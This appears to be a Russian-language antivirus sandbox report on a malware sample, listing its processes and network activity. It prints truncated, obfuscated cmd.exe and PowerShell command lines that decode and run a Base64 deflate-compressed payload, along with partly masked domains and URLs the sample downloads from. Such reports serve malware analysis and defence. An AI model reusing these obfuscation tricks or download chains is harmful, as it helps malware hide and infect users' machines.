Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\Cmd.exe /C "SEt iPaof= ^& ( $SHeLLiD[1]+$SHEllid[13]+'x')( NEw-ObjeCt iO.compreSsIOn.DefLAteSTream([SYstEm.iO.MeMOrYstREAm] [sYStEM.CONvERT]::FRoMBAsE64striNg('PZBda8IwGIX/Si8K...
Сетевая активность
Подключается к
- 'gp#.com.pt':80
- 'gp#.com.pt':443
- 'fy###a.unipo.sk':80
- 'lo###ledor.cl':80
TCP
Запросы HTTP GET
- http://gp#.com.pt/omklzG2kK
- http://fy###a.unipo.sk/data/geo/agent/wav/MrPZyYA
- http://lo###ledor.cl/5JU7HH8s3T
Другие
- 'gp#.com.pt':443
UDP
- DNS ASK gp#.com.pt
- DNS ASK le###.jerryxu.cn
- DNS ASK sl#####earcreations.com
- DNS ASK fy###a.unipo.sk
- DNS ASK lo###ledor.cl
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\Cmd.exe /C "SEt iPaof= ^& ( $SHeLLiD[1]+$SHEllid[13]+'x')( NEw-ObjeCt iO.compreSsIOn.DefLAteSTream([SYstEm.iO.MeMOrYstREAm] [sYStEM.CONvERT]::FRoMBAsE64striNg('PZBda8IwGIX/Si8K...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' SET-vARiABlE ( 'F31' + 'K' ) ([tYpe](\"{2}{3}{0}{1}\" -f 'iRonMEN','T','e','Nv' ) ) ; ${ExeCUtIONContEXT}.\"INvo`kE`ComMand\".\"i`NvO`K`esCRiPt\"( ( ( vArIaBLE ('F31' + 'k' ) ).VALUe::...
